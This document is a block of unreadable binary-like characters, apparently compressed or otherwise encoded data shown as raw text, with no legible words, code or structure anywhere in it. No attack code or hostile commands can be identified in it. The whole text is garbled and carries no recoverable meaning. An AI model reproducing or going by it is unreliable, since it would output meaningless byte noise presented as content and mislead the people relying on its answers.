IHv@<dWnlߓOlSL|[1%tƏ\\`EɳۋڅAĪۼ[[\\ΚkJXo\')\'JeUXI`=&Ox= 1jם8qVwܓ݅mn4+t&XdEIvX\\1mP7ْ9c\"7D7ZA+]769Bs>-BnV CJSm	̏`Oв*^Pd\"}U>^ƾ٘!(N4xCCO8DD%W~p޶֙{N~3>@,:4*pӨPHLS	ͬ8R\Z!z]u\rs}%P^eK~T*)SI0=gҟTk\'7@LGx$vrɸ\rEmiP`Оs֢6P<\")+Jhr^fàTQ32._lVߔYEe4K.jYs\nٲ1W</!M7+x9ރod*r\'MAca+FXE+K;{Juo\0 p o!\\4尲F%|9`mitP)y+&˨}мpmEXã;e5!QC5I֒.2lw..Iˎoz+$\\Ji.1BhYt-wm*bOqX+b妶y7+zco./䥛<~sQͥMN7y*d7Y>VCN6߶zVeʐ\'01&յOŠ߅(:~-cC	zQY~4Umr#U8ܳL9\'i\ZZX۱V+4+G\'ۛ=B-3w?#+\'S2<b@砕y}X^ԑa\"qec=}v}\nO/~XrojjLD0=(uWk\n$Q},H-4	(*(7{>߾e[yKg?G9S55,gLr(3\\cLYLE Phdu}_̅[HVtc=8\0!/-zЄ*q;CiqTBZz/>8\'}}u,_88s}GgN$/m︷;b`xÈ%)Fr\ZZ8k	ݶ;5]K-H]/B*-I`7(IXQՃCu;?kJ{7yV{mYmkee, ^H9!SM.%BdK!QX@㋧ᏚWNѦ*⑍$\'7\03ZjmzI_S><us\rFtyMכ*}R.ь$9<RAq3[Xǁi.&ReP+~=cn6$>ȇ:uT¬\Zh9RP_\"rn&fѓ&A)zFSbɃféj)ِj)!}IGQujapPuP45bDBv:n=Ƅ=.AOdx\"l}@0SIP+ CءTg-W$k-vt{%j6-++L\rtRFxE8@\"3%%~rg#ǚ[*\nJVAɰe 1Z	.鈗^F2DjiNliCw-H7=KQ$\'lc)sS\nTR@&8q:iڭHK龜S+qS<[qwO^1zյDŴ`3Pb	\\NG,(|\"!]xA(MN_&Fny`gT%C#l2ބ]p=|_!\r(?[zen,g_rm#;/*}QF,ee%+\\\nfkG=uA2kc^[+}ku6&s\'vN#nǇɮ4v{oӡ#}P.26!DT^z1Q6!X\"*X%QCoBϟÚ|nl]-rs89-8sRЄ4h|oONt.Wxyՠ\nFVhD^8}n<,VOeh]\\ZqOCǤlyTXIˈNIX]05K!-\Z}E.+z$R*⊙X\r#N\nQKϨ\"m`H=cЋ\0^X1]0ĐmҦ)g6+8\r3;ޞ~9Ekgms{KӵЌ*Sߵ9EwRCls\\2Vn9g4vKuc`t؎\"%7҇fބasVPX6x-p)h<p^D֥==GT뵢8rYjJ\nP\rD<ʔL1~*=z<znď#/ drZ\0r[.*|e~\Z%Vu}X[]ۭQs[Yv\"	aU3Ntq*f k|J:KJju(rg(\0T\"FIrD*:e[Ev.Z1PZFa/qW}i/rs N.hVJxYD$&h2	K~SSsOv˔ۤB>7im(c9Lրn.MLh4fqKKb#jYu\r|~̰ Aс\"Z\r됣Y\\L:|,kMOmǲɏG7ElwPw{c㸟L⠄{vn\0n(:#]ƅԆQшt\"ٗǾXD-NrETI>i<oKt\'T?Yvt3ELj`1mC8wSv^~j|0\\ܵύS)TX^\ZV$P2Lvwi頶97X\\@wGuAv(jz0ӆ_l)ǧ#=5%7R;ݦgv-/K@R5w=/\\@o\Z)嬤M;A3(] ^V˳^Q7LPWkS_7vf=TSK/Kdcæ9d5酤EB~9aN{Qŧ87C-ƐeHt\"yGUxR=/%QRK/53߲I~M\ZGQ32y^bO	@}^#,G4Wh-Ũ\rCh)>]^|\'=^\'@{N#a_7/<ѽ@_\"ZpMr|\'EF>x/͌\rt~}\n8@_Ԙ/㥐ȍhkR<q>%7h<o++37>a?&`zqgV;Zf9``%RP&_&vJ:]ԙE1M\\P}!V\\HhLr\\;AQIMEqi>p-i^6{\\׊E^V=\r#\\\nKt#Z5k*iφ{݌6}+>+xwhBpMqbx\Zi!PؘOc^D6XQB>!{ވ&=t|Y8>{}Rgq{}yl8.B1_PN%[P87CFjH]\n/ZaŠR]X܅ht\'Ą8Xʭ;zvo\\iDen5hbK{-\Z*\0kY\\짣A.ZUxP%[p=Lwe_+oO6Vz\'6Ю<jÊq{9Jm<%Zp)d5Ak!U8`rG5Yђd+BFIta݆[AD4{֬Q}+`z:U`3\Zy\r#GV&.]xV=Ef,T>d^uv*_Åx-	Cb.\n#m02m2@{.u3;,!9yRL4suڗ:PlNP_\\(nR\\їR cRdM1\\lfO7AQΕW<31 cJQ*E~Bx\0\"f1~j8޽WV;󉹴(ݽ`r|Pc ZC-&ȫWzPyk4S1<Yt א;v-tĮ};h}u^}L^6Wk˛zw\Zse=YhᲟN89lwƢz98\"hǇڙvqr(69X0-ת֫~\'6(gR1HB1\0qE$ȐRj@qrn,,Es^\\h8_gwwǻ;{i/Mܳ5׺2[o]m½:.\\k7vvMOtf<pju2ǇRw{^zfeGRMdH!D\r$8r1$¤dk?SHNt4B	@r7NNHjYv6os/0?9iG\n@5\ry`.!2win~J{3;w,9_T[/?-/VE՚%H(gݵjvb\"Xo	};%S:}_}Y*\"-DdxٵVϯ!L6,Um\0E	ߦԊkSr/{C*,8`-_狼`\"zHCɶ6\ZG^Ʌȁjȑ{nBF<!|LvHk<p\rʁ,CqU} i_97#_(ZD\\ƶPiށjZ`r;(>x`&Dd+j}d)p:ز6\rOg=7NZ)\'vË_zD54&(\'I(\'	*p]xc1+@)/oZ7\r:N^ck:N_:16o]Zঃ%IFO/	0/ȐS`T%osZ\";=*mX&a9UtՉ7\\JcMK)ʚos{OG>6,˳M4p(tn5T#\01J̣E)EtDGA<Ik4$y^eH\0lWKaLҚ8WT$E#^Sm{NW<A4\r<%v<G.#8LD6mjGl+YTpeSouC委,&%MڃiĎ	3\Z,9]VؠC-﵍A-l]+-Rx]z)YȐv8g\"BJ z[uڔ 3124+];}T:\"NrP\01Pf!5?8*vPR[06Ԡi8qao\n_ͫ	ER8%s2v+T=lW;ƮCc{Qe>/x_m;8ʝzO6K\\lm\"6=Kh=rY@*A]Nw6fszvoyy\\,r]/d$ّ-)JFVK/~?/J\Z\\_:+s^rt)$)XufWZ!-ySV!XاUl9?N79!ZF_*n%	{VA[|Z+EV	̘j0CVkOdQyq$+jwlj2@/.g94.0yǡ-,SZi4-{jF30h3a{;o!B6nB9\nK>ѻ#gZeN~Fe$Ocu\\B<#꾬b^={h[oφo7N\"\"h<n\n,^)aHz\\U0LExZF[mTOLuKgֹOѩO_o!1\"Q\':bje1oE})Qix	j\rt+¤nóZOeR.L^z\']lء$ƪpEUBΥ,mr>N6_I74x8|5EfƁ/M.4)KBvT0V{Z,TA?p0\rlJi\\[m{4:6#OVYjRJzv~.;|1S<P]hn7:SnOgvno4݋VBooyqm;5gGb~q4ZrF>M}N2s\n8wWaZ:jPwu64/s:JjPkɩU1zE9j\'kQ;	2y8\"`rm<.{_|eZ?\\/Cya~)-amޒVd^|nV`RbBnqȡ	-.Yfv,^KQ~rبѹ:q\nx-3ޜ\0FK5<r#eRT>#r|ZI`-I*cz՟F>IA6=_	ųajz݅Aaϐ~<N/ 2Bؼ!r΂(/m%ReWbf=4%)JeɅaA̺,]K\"<fդcW	/ȕI%|}{Nk\n!wD^63-7T=_.B13~pݠ̱ۗ:cX~\r2G0ݔ寅;!5QUq(Ǟh,(\0xv?6\\漎i :mUw|\\ȚS!%\nC~Nk_};tPbYC׏â߂,R/<m-\n7mQ^ޡ!Wܧd~AZkk^a	,/}a`&cK}N,f4PSbpDRn1ߑ6+\"@:p<O9uˤL真~9u&sϞωF\0\'$瞇1W10$l+txLT\Z,ĥ[{O#Ӹ4/1N^4clm-qj)mM׵]r*1dwO)A?*,#+Z̶w=JW4)<5b_^bo_2DE:,:xZA*/omcqc{锳RHBg:O*>ٹAj|\Z\r(җns-?3,[X,,-Tn9sٗ=sYFS0c%UPz(k\'ȲOJY-݉.۷j޳-|\':/o]An㩹MK)GGMBg݄G=aꔤ2m46%PBqt,ߦFvI*(nAj@b\Z.&`7v֍?wnx\rX-Ҥ.eUĂ).X5!Po0훶m8)JUVQp2@n$Cɪ^U)&F#}\r4%Mi$}?ƨgw=o;Q|]SufqKX{t$o*by\'>ГE%mNxpRHheP\"Qq1P]2ƾ\',.#[o7ڠ3AKfjyR*{P6B&\n˄OAk>Oft\"Vo8=-(ؐtEY`t\\]́\Zuyޙ19Fri\r)X\rR.iolR%rqU7ActryJ0A3`YgޙjeV|!Ad:\\3U7(*tXTbDt{?0\\faF\ra{D@60(\\@W\"sϜzNf=ݖnvF\\KlgD\"\n(l3r뢋sHN=ch7LNҖJ\'m\rI:S0L`/meBC9gqb;D,T$i@98&:8?4U\"^QAXn8\"L(|R\0׆j;tHB8[UfdNt(yAn/ULJ%W Nj\Z\n;D!{4hhY]hJ4xh@!;)ƒuxPS0N|7>/*[YmnUV:q{PB3rmXݕ3 PA;`/fo:JI1dчҧ@ՒqV%6tm?Z,O56naf)z\Z%h弡SCv׍*fRAHtb1GL9C20fi4&l^alG),kP_v:\ZMxǏn/Qs>y҃(2CznXé$\0_l\ZBBc#ߣg\\VSZ9Y|bdEк1MQLG$B$ocn}㕲>Јg|/..tgzF;G\'G7Q*^@)\'iJkY5QQyMӆ\n89,_\'-leáY={}N=FiA@f>|f;zFqB^GגWl_.;mgtڊi=GIxV4\'0X\nmNeFƆڳTu%KWrb5iGDY`fJ	6pj\\rO`\n_%⯓hihrZhx	gG$\"DIyet9c_qK]lY:_6Z5GQt3\Z2,bD3J졌<U8IA#4\'SԱEq;pVo\'.@Tf	~4ҎAGT$IEsuF#3.z3tAmҙ\r|;`L֮I^7T	+:ct	n#3-\n.ZVR0rǌoVmRMA<\ZyF,%c0G{fˠ\"{{S]:\0P\rf\Z]#Rfu{#9m{&|\0C꘶?)Uv=q<XcN7d17\Z\r$˚k$r	!1eվkaɒ,h;3#ڮz(ǇgQnMR5Y\n =\0|1<+DgB.ZK8q4(mQ~uL=qpNQH6)\rYXb8qSNU]TD:U.n*YX\0b\ZuFZWF<\"Z3eR&\"WeyY)V]㳲aY83db3~\"qM[\"TMX[9=a^::24\0%|kLKD[\"[׼\"!t,N쒨GeԧnSXP(uh	T2:B 	lϝ\04{g:޶&yM\"dDx$)=r؃QJ2agk\n{\rdAgW\'WkG}}`\\mm/G<*ܥ޶Ҳ-y䊬Єk9fr\n3]L!V̙J6\Z-p5.=DIԦ_rݿ9Mbe2u,4`ⴛ]1_̭١@BAC,:+ke:fAqr]a;,VnTvt\\RKTɤ@yBjqRB0}\Z-m%+`%Xi4y]b?t{+n$. iTfp	BF4^9efM[_ZhWQ+ޘmMYyܱ/0f6hdf7.\r:tb9B$!yE\\dy՟wfmzϺ-*>cB-r9OmtPfvb׳^#= QBIZC\"e9UDʪ\0)vt 5!`JnNI3w(9dw;KdNr+׃yga2o1\0M\no\\ɔFBG6:\ZNxKZ\r_vjy%o,ܒU坎1I<7W#roN}^?10\"G1(p:J`dZ\'?7GxL B7#;Z*Гlkp8>h}}FN;>X.5/S(FiPʜbi	*u^œz\r?e\n..6m`?ȊE9 D{YBw:q!Q`m%w0dJ`\n|x!@q=9ArM2IȢ8hUe2\0e|cGOϯiOךNv[߹w<:\Zw]tkC|}_%[d||йK@p>څ2]Ht]269x/h}4qO$rʓ\'V_Vi	s/cݶ)C_6p=Ih8UR͝*Mv686}Ф&iֵ)ME&:oټlMʞN\0e5\0ZͿW~!?z[3#s6j	lBkBx&G{+a+H=Br!D0p>?(5ֺMdl=0>ԙ[\'j\"!d\r]n#[!MbVLCO{ߠh]bfn*_/#`5D!o\"xvj[5{ʴ6AE:Gןy)I\00x:\rrz>]Ā[6ngkVqŕvTP\Z&R7	%~(E5wtdzTG^)OyAF	!;@YHV?*Fm_`mqSlTEAޠ}y㌣5A}`ps|y\\>^|bǧ{r=q񮲽rm-}ؾbݹ*gtyq.]״m#l_A&em:w0(|q1C⒩ (8 LrL4]JTDF>+YZd\'8\rJ*\\>Wah\rB8A؄$B}HnP\rc)2R0_A*8\rj\0yl\"t]JTbB&\n|kژvqTP-iQٲ}JT\rWvKr˔ٙ5PoV%Fe˵V+I/*8^%jPQ2NƜ/BAX!	_r\\dP]X^	`v$)ޅi*H1\n½FSb%MӠ8f!i<\\Qszg1YAaGa 3rqiX5p@f8醐P-\n1#(W^	\ZJ\rT[ޢ¢B2)deV9L%de\\ڬCMY1eѝ\\lV8	#o^au©VՓe][.z vV`|o\\F-`1 ?|WۋF`<sjn/ぎ\"rsnb@	dٓVzO߉h]/0#IcF8kOuSnex6B*}2t.Ҡcrly̋C!0[ƩCfFؙ֔eee.v+2Q`ٵ)r*%JV]vl`U\"_p\r0躽_mig5[Bĭ:On?\\.v*l:`T*E6)h\'kF6Q3=׳ک-?1K^8bbjzO@nǇЗj~W-Z2QiRE[EM	G2f\'K6(mwԑr(Aex\nӐf2 C31,+e/CZl,\"2Dr!Xxi( \0\'U)g(\\\0Dj9܆L+^8fK amwܺjs/	RU4`8±b̻,ZZ\ZxtKᄅ!=xOP	Z4ؐlDڳ㩪ڈr}t}wfjڿU]99sx%7HӇwK8A!Ѹ̍^ZHȭWʈo(y| 2Խ:e\rlQhu[U%D(cE(ZDuӴGH7U`;S65ksrQηd55/YM	wH~-xcǏB<bNS61/E\0Z!{m*JXNom6v\0ħWԲ3Us/\"GF@ɘWu<a{ۅ˞aj{gqwz0V~5㹷eڥE>T_bI#qZt<_\\_FY䝵,nf85.3)k`@=tۖ<a`4h IǂY\n^9ۋ!{ޛ+DVȰD \nbA%!۝)r壥3d>N:~bn^>;uU-m|4\ZgD¸Cvr\";Rt?%ًzY[hgǒ6ߦڇ>#~a(|D;TJ\rg\n@a@y|j9إeݩ\\\'\r1M\0Z)#M$|Ř CB?|1>s_dE]+mt\0dWOֶG@оdT0#4\ZN;,NOL\'r̛8$@pML3f5Q<͘5\0+bF\Z3\rU2Jof3ތgy_YS73IZ+U\\3\\s׽pm^GU*PIhƗ>1Fiw(LȎBE?/~|?n~?@I~roﯺcoi?ꣿ1	D;Q;Z4{\"KgkM|-&|~ʬ8[H|tf :϶6DЛF tvg\ZhOCJ\'Z`E\0~lzGkW]t~\r{usicH=v,֞x-ѿs3ӕ^!cwMnON\"OQd`r&%=X\\\"*40/0BV,bT]r|i	6J-e}~CoƢҽFrz#[*\nΔ-[Xqp;(k/dn<lmcO?cRMy2;clٗ5ي>G_,Б23@q)-*ە<b`Psh\rm\01orRc.f\ZIARY.:mTVݶՋ\rS҂B>FAb z5|z5\')7ҍ9#ook[81q̮h-ϭ7ƴ2&ȟJ\'L\n\Zʯw7ϡ!ݩA]F6_\ZY@;o^?1	P]cHeRѦ2ꉖlBJaeVƗ7U2-םwXnW]ϮlM19˅IX_HǨ){V5%q[Ϡ3N\r*hOAU|Nf®\'iR<i{\0P8L=7p2jͣPkG[Pz-1!%F6B<x\"\Z<%o3#cB<ƇN7HF$R #i^LᢎI0S*)UTґSyGaKO;:]r|m-~ь2m\"A|At?dkg]##&Ֆ[lh#eXFH	WI;\\_i@\"1QkN5;og]鶉\n:(@4 3@\\[6\0XqlߴFϭۏ)bNwVl¤=9CЃ)fFa7U1rrnT\'<;13::zn>\n>@h-V{YbXr``Kdee&F#ΔS^o:愫10RHr\"O<ȴQ<3U`l(,=Lk]N3\nE)l)#\ZE-Jm66CfhA)Ӏ)*,R\n|ױ]\nӥm<_\\xH\'}T\'!8$d!hT\\/[+Y/;ǂۯI۸*eB!q*2|⼥cC	ǧFi,+ j,7Ү+wګ*IAr=ݢcք1ka@<N̗.r2kaF5J!+?|M(]dS:e纍%1%m¦\n3Dp2E(ʠ\"OY	K\\;(ZN[KŏR[SyuOW5W-\'`U!`1bRYI`G)JY-\0,ځGRP=;\n{疺.~n	:P#&WC$RFsQXĠoX	Dr|&tc)y~j_#+~ћ\Zbr#٨Fײ#GK[yi(wS(>OMfH5d<CdeS+ܾpf/4L$YmN[Ve=<m=E\r\\r߱PCN}NHo\Z\Zdyj\"_*xYP/;B/Z(x-.9jx7̎UtA~+e|t外j|-)rb,\rXM~൰.x?gOAQ	TآGZxPaIף\0ƺx^F?1iwȼL:b-#!P3v?S>wȧChٝ \\ײscZֳXv̕J	Ӕ\"?	%%-j=LM\'i\nP7ۮoo\r<an-	1\r!;)`k_=\'R_*OoL음zᑼLwNK\n(e\0\0N\0ؠYb~+T3\\k5@v)i)pqWڢa\n6wg@(%FTth4s\0S0t~;pz@drfً~v?۱[U39ĖV鵜c)@i8e5)#-5²S霟YyxA&)*4,P%q`\"Otg8J>q,xg5qNN۠,0E=s04jtЊݵ=l8^`\\=bOfdKC#7j(m/.xbx!@Ed~\05|f,$wFROIiq9UD6?⭚p5m=.QFEulڗNp2oڃJYt}ʾy=\\\\+\Z8A.i0[	j,&:aR`\rLsѕTa`lt<!pd3VdUUdz~H\\@>=#]xH88$QJFAC\n3+jS}@0\r2ƠGU)յnTHM;D*q&a	v($B\"G}c`Yn\05x!o/#siVN[AŅ\0ou<3RgNp$%5J\na=,ORj|ҤaBOkJ<\Z\Zq ȑӞSGia:US%}8?}k4ȥp-#2!CC㑠B>4\rEˉ5Vf9!O\'U?μ}mȼꧯ#!u^TŚ1@ǰ!pZ^׹2`e}k^r~{\Z>_ +[97\"{-B-x*~qgI^8ٖhS:NaW^ڈJc\"#H?B|;iseKd{H\0-Yt\'4Ɂ]܍	b4!\Zcw:)3̎QC$QH4\n4UG\'3ѿ[s{9?G.}H ӵ0j;1Wsr*M^6fhgζI_زKC/*޶vn@5\rӸ삨 ÊPV88-n|5)!w\".PsZ̙޼rv	dTe\\-ckWST?^q(oRlT3dw\\\'yt\"t`r]PZ0}ݺw>v؍Mj;>۽܊^eOrlieieTeU4Avxމ<*324t,^LK\'2\Z!@dЯ\\l_,@aN8$]ئCICb,BDi\nZJz 6Gqzl:wR7\rPјCHxt|X_?*aQX22{\"R0дt4*\Z x<>=!NƩ·#9P}Qf^\n))HN!O5f-qzx^kuʆ<~qu{.g	>Սʲ`=XsݳU_<<ܺoV|\ZCsC-X%wksye^nJӪV*ݝI}p\0 qٓ#y4$]KhH\'Mcr풝ӌᩮ?XP2\Ziq\\8ZoSg`!L*;\ZK[faVXz45ǩH\n)b`|D+1\'=/^Z^F:Gef{k\Z C<CgJf_:~1`uپGtb8,ʯ0\0u!k110IRGx!z+!{=}v<Ry>ImKWh1\Z˹)T2ˣŪؐ\\鸗6Y!+\'+|KyHx&YN&d)+\'l .Dqz-\r,Nxn}?X<;gƲP5VS_V)I*X\n\0dQnIb$=ǎƗ\\sbs^?Og<+{\rUbϰIψ,{u-1R\ri^\'U=!5T͕*UM:O79Y畃ݱ=αX\']rnak?X`N#L32LU41qTUNt:4\Zv\"+JkA?|v}7[?K}O$<H.\rL3\\\'h7yF\"i:>C[;G㾘]#Ϥf}:ORvt1A{;u66<CSMhxB|a4`~vLoK|s\'MB[^c>M|;이;6t\\0~ʪȪ┊$2ERDV#\'\\ 0*׫Nis0a=99n4b\Zús	sfk2]+#I-ykdkN\'-{Ldйn%^t{\\k_ǝx}ރ֓1m`tuXp!J9٧f<PqR566\'=<K裙h?S:s6v::[GU5]bz\Z7s9*GHR\Z!kOM\\$K-/:{hxf>oA~ȱr٧. gq\rQ̵1xGYfxz6::PկsY:wDХ-x0\Z࿃O\0w`ÍïH^/C!ã<t]H(<v_е> }2\n\'?r;1=lm|0\r\'?zx6\':\\#;φ(\Z}1\ZC=\"T=9\"߁};t[yC\rه16<#). !$gQw4 s,qÞFgQ\"ƴ1z߆FP&űٱ7%Kס;_a6	q9\';pz\Z\\X5k*2-\0aCb*>>}u-{~]+]H#;dZSr6Co^uVy6\'q\\+\'Op}gSC&WA`GTL-Q8#t/$c%G\'M*V&5xRcY+kk!r_R&\n@C\r<\'<ueTd&ͣz:ohǪq.S\nG,XՅqӽ:;6K)x`mcd{.~ikn]5Հu^y!Mbʙ#$ѠQ*|UZ\rr\rRi/9*m\"\\FcuVk5>汅9kPn`Ê{o벦KէvNp(^T\ZPU^goVwe,ɶ}V4kE^>[7\n!qL\n8jٱfQ~T5_8 wDnگsGT<ԭ\n·}Bt8\\$xp羈%/It&A#]і 84^EFij8\Zj=|3/i۰Egeikx}RVVYmQ2JD)VPcw̬`^f^ WdHͤ韚\0cs`\'n	ĄOMm\0LA0{ʱ	mfZ#6)>&{=CvܞW;qz~\'n)>5cڴ&j\n;lExyLt-f2ڶev/6q5P3;qL;FM{qiD+&v)VPuGwxFSl[ި]\'IdJ,\Z)VnŅ?Z1M@kB5/q;\n}xI1kіmT*uhbv[KmB0-WP[\\@ekJÆ=\n{CB9_0]c)TI\"*^ȠIӵ8)Cn␣.@q	`([zjvuPe{=.x-u 0Wk-P9{ȍzSs( 3ïOo/&9%bɡw<[+iK\r.Ɗ-gwL=C5=Io|///_1_?%_3ςV;u;ԋ?Ih%ycz&2X5M#!F	:i\"${Oi]BsmA(KcEi眺GdCQP=D\'\0Ve٤2^\ZڸiK3?-D-ƴY\0݄X<YZ=kҞ%Zb\\%i3#yЄ8^SrQD\rZka{5aK.8Y\r.3<v>F>3wc5}uO6֩fSM9Kҙ3PPNVwLX@c\088;9!ǎse^>paawL#2b#,FE8@`N*f\0B(F\04$He֛U&A$kKuI`_q(¾+P%K@iuIcKA\n(Li0nn?Z>g+D	K-BA#*ZcN(/XuzZ\rFj\r:QdfrI!LR@Ak\nm}qT*&.\\7}p[%.u}GN<\"m\"^ػ:iG#x]h\\w]3\"6&3xG}	3cNEIB\nyMwH?lr]l;~e&=Ly(3*%$`vaesяG|W4\Z\nÒk2e|S{M]ǸjCQTK[\'6wc>urʅn[Ǖ㦱bB2:b5l	!֭a$i\roɢ^\0^PfXQt.\'%uq0aʯ@ůT\Z<Ѯ.^\'\nʯl=M&~\r)\0Kcj}o{w-vV/NխN[@3WM.[~.M.ŭ\0ʞ,XsqkV+nHvy}a\r\'lGyNt6yeb,>)pa]H\ZU6KUzu0`xU\"\n5>H:qZ4wzc\\{Mhڰ@ٰJkg(TSBvXԚ~t?F`$*	4}9k`~:^&ke!\\Uah]IY=LU{v\"=RSX-4#t!A6ɐpMpq#:(8SI\rs-QSs)T,eHAm^Xl]~`}t6\nQг,#e]+K댿4OjX׭eir\"/ӟܞ^(۬|ͺگrE^(Nm~g\r%.HWY|b;:8_Ȁjpï6B`Էr`*m͡uuuނB5IjE_P>.D@友0FG\'cnajr.++lrr(x fDW@\rP$\Z(_@*E>^3jDU$3q!\ZX\Ziu3E AOe\\G\n 0.p֭,ZWO	Qp1ٚ\r$#0@ඣL\0h-l\'2KYere?R\'nN+)\"Kq<SA\\Qh9|ҤJ\ZioVuv\'^/h\'BqЦ\"עZ1AjF=:Pj܎:ȴ5.0,9DQNLΠvhAJPsCk1YKPld\'m-ZbJp7ۀa0@\0z9qC]ޠRZͩU`ege\Z-EXJJ9T;|t\"M(&J\nj\ZqOF^wNlr@cEȶrhd?;hXY((X]ؤ-Bn7ʅl! % ڒ ׬@u1%g(ugc=&7	!L^N<ᖾbmhĲI$Œ.cpDz0Xb>&\Zm0d[oR~FPeZեWdFXLG7QƪW%\Ze޽.(Fm,h?\rЉh2~tJ}vh0AzVt\rB\"<9Hm}r0Q:wGU6I`\\z/B+|c\n;ʻ2S\nMfm_5Հ!;G*#\"=tq*0S޸_&yutmuhՀ.*>r܍U7RT\\CB|s;@{\0/4\"/O%ޠd7l\\^[|B̻,lO|dkBϜrB)[3igP!(7poTh͟j3m\r=0LjB+\\\r(|Dy@~ϑUwc˳Vg䤳yp\"oF(hZ䚙l5{\0*U3.08qu^5^B2Ǭl2ca P*KP{\Z7c>8V{LB_|\0wm(4Mo0%6zP\0Μmڴ9cvCBA6yM4us\n*2yGܨm-Q9>44bDJNb4vO~ƔFDB3`*\\Z-ñ|:J\nTrʬ4>\0lRg=r^XY[KEX}|ö?#CXhs&	c9ϐֵMwTsI\'\r*V%R4K%mo\0\Zf-+WLA ?~EG?\ZvVߋR>{t<*KԧJxB>KMh^  7q^299pdlr0%4`~֘TDs!$;\nzhU{{zn\\}#\\;تU\rq\\h}r-)\\	>?ԯ9p\"QWtIeـ)Ym_6A$_M-u)@άHV*rVU	łkVXRY7x$o@@\"iVW	|<d\n{Y`m\0X\"}G\"ma߳;^ᆫ=Gu?׎]y~F뫯K/*v\r[x.i3.Z\\qe]OOwʖ$kUkild;{l=j)#6)wC\r`T=l6,[lԂXp(ևa/z[j\\骧Nfe[w#gW%ߤMq}|-8YJWq+Hh\rJ0\"/-Z`Is\04偨.73I:b%K\rsKQ`e,$J\0W@pő=}7.\r83_\\[3S}iYc3^\"ʵ$ר6\r$LP`b!Ѿ|G8<<OGc[yI6dsԋ!c(=75}IAu\"xF0B!o\npyR3V)[b!a)DIxdWn^N _U]Pyc9Pҡ	\"xƑN8쭮lK;+vV6\"ǦM-+wE.A!>MpEtKEh:rMWQ {a7i,8][X2Wx{w\ru}fZ6٧@j>ȩDOAI3U- 9$\ng@j/ )ĦY)qo5\r<\'#IXuMǙZCB<?{-{ph-M$$foZD玲wH`hx9P8Wd>\'&S\n*\06\Z%9D At+hJ9Yӿl\0O=.LJ@eEuETuCޡ6Qqd)=k²!2h;\raJ**\nFڣ`Z+\rBx5}1:[OÓMT[_{+/S茷z³֊ӶuOO<zz~N//o\ry{ONcy4PvѦu* eZA4*h4\0qLkL`y4kOE9R}g\'tUspֳ{+um|-Iݸؖ_As,wgyz8r[KEPjv,<l~@1,sڂee4\n9#x&	ѭ(]Oo\'.q6 |x\nkZ	#9msc=[yv .d\'kgg/aNkGӭpO뫢|s;v8jK=Ծ8lDkkw;;\'b5:{G-\\|&msm7891vg`6Is\r \r^b^̪Eb8j{;k[O	Xi|;٤N@$-1\"@E¹^$]a:$!lHsR:=r{;ݽ8|H[>[-9m7|?_sֽ;͵]A\rս/Ի{ssכDړ~OIFUGet l\r%DRP\Zk+=wgcA}\rJR㚞?%vRT䵽dE\"HK)5z}t+)o#*D=<~iV*H!Jw\Z\\zrb5b=Y\\:\'WtGt;!m[5ZNuEUrTmoteNKMC[nHMwZ&Bf_yd6v?Lѝ\"4HǡA*\ZnqxrilF>~cVH	?t	g~XKɃ1ůq&dg]ޘ+:RҡCiI>\r7\ZInky,uyl!c	gXō\\GV	4;zՉZcj#e(X/&~/~yC23Դ-Zm:y!f@i{\ZeBɂkm#7^4g.`zlScdKf̧ɹ:t]0%5-^MV$[q 0G+]FN[Qئs{mTJyay\r{Ky]֌d^VCF϶DC{Z\rVے.\0AA>c\"y`5ċݍ%U$}j8$l\"L׊i\Zp,T5T>Z䅽x\\X4\0uMt^^*}	(BXCD9ꯉPq/q/SNv=:H7eM@}\'uQ/^z=C(\nڄFAGn̗lwN&?A\Zy(aev(T-5w\"I $|z\04;J-Dfk¹ 0ЧeTj6@C\rt>Gygax!@\0\Zza=_G*nnFQ9c#sPxQZ9+Ɛ`\rF\'1K^T\ZK7מ-IZ@cI(T+ȝsD.n+ N@hV)îc`{ϟ[K{\\@6$ڗ8dBqF=	mj\"&Y\0pqClr#gёkЬS U諞xߏJu&k\"m>yj̟:ե	`X	Ef!BP\\5;$v]ួcSZJ?58D%=nd-E#~qL\\B 7H72QJf8#,**J 9\'CqձTu{P`&8vӖ\Z0׼CK%-lYBX{|lL C8Y^pLw\0H9GPGg@{|M+3:9Cul2	Mjda\"\nJgY=_#:f];!\rv	bqtZG\\gD}ؼг9\n4)[h\0˦FΧ,+T@A7\\2qAFa\\PgIyAO^g_,,>OEsZ򍤣:,\0\'Δ$Ur\0\'jm\0y.K DULE44(,k{7\r)R0M;@Nԃ#+&^j,2(fbHE9a\rQ;#γh5^./}oaŝZgm{lqjv\r6= ]K,\"\'r<L*(@U¤7w{ƳVӺn|>=M΄;\'4\0zxT}7d c\nX}Ȋ\Za^ǗJ,n%)*oW_t%s15*Ո}WE;WwwFu7f\nFx\\\r,G##I!KF+\n0\ZE1X=\ZihS	S+bŶ\"Щ/B{|ZR`TyӀbN)`&Fɰ:*#,\nG\nҳTvV_LZ>6a{|WɋSg\"	^P}slplA^S弑G\0$fj$j\04&.L:>ʺV.2ThT\n%Ҕ}4z@\rD43C4I!OFMN>j,u5ximP*f3V8:hyQ`z1EC)uLH2ƩxuWIAE\'j)h;*։(t<oU|<ըܺ#(P{7c1>]E|]2y+}[v/l\0WDI4DCO	8hYSc~o 8([\\?z\\r\08	$\0\nIc0<ESY@63$ɲ234Eo)<zQٍ(F9?:\nh`\0UUۖ/hRhmZ}!r?4ԀQ*J(ZHbB@l?ݺ򦶹=~%?9kɽ~y:\Zn^ۧ]ېOo<}>|?3mPۺH܏N_IsӇgcQ\"m\rCaksho{)8O+IƌL?4\0,S(&SL;Bmai{tGFEFL[ouG >{Ͼ~xھ=:OOks7+\'[ޝO:_;q)L#v]QǼU݃\\1dڇtJ|\"9e0X]߮9Rр,W#,1y$s\Z,L@5@3VfV06C<G\\uc|f	ydզ\\ʢXR.%5Հi)@-I\'	SmQ3Xv^vdX67w_7!XՎCH3ɵ3ǏЍ,()\0r,$$	O@^V+4P\nv揳TJ#yƣM^G`E*	?Oi\n\06uL8~@7hf/\\{=x^:Lhx@RX)LPePS\06Inw]kv6	}^hCk%vtf::\ZZj\Z`LDoV\0\'cz.y8{*7ɈEFkcZI.BI;K\\.q\0Bk5\"Na&=.+RσVݹQkNޔUj9-\rvWK~xg$Oofb:8?ӀWbZR*#%ع\nVe؋a\\!ZMG\0X.fTƽ}[_RUWQ(b$ý%h#|bYW%Y!ؚ.G\':b֧P0Ы\\hyﮭo>k쮐2\Zl\r1r1\\\0DIe:1N#$&!U;At܀f[AG-8Xx.b6@QuF5qK\\d;b4JeT;s<Gג<B(R-)DCkm5}ܭ=ޱ{\\x.$a.~(pm<o^IiADM\\BXS;plr,¨f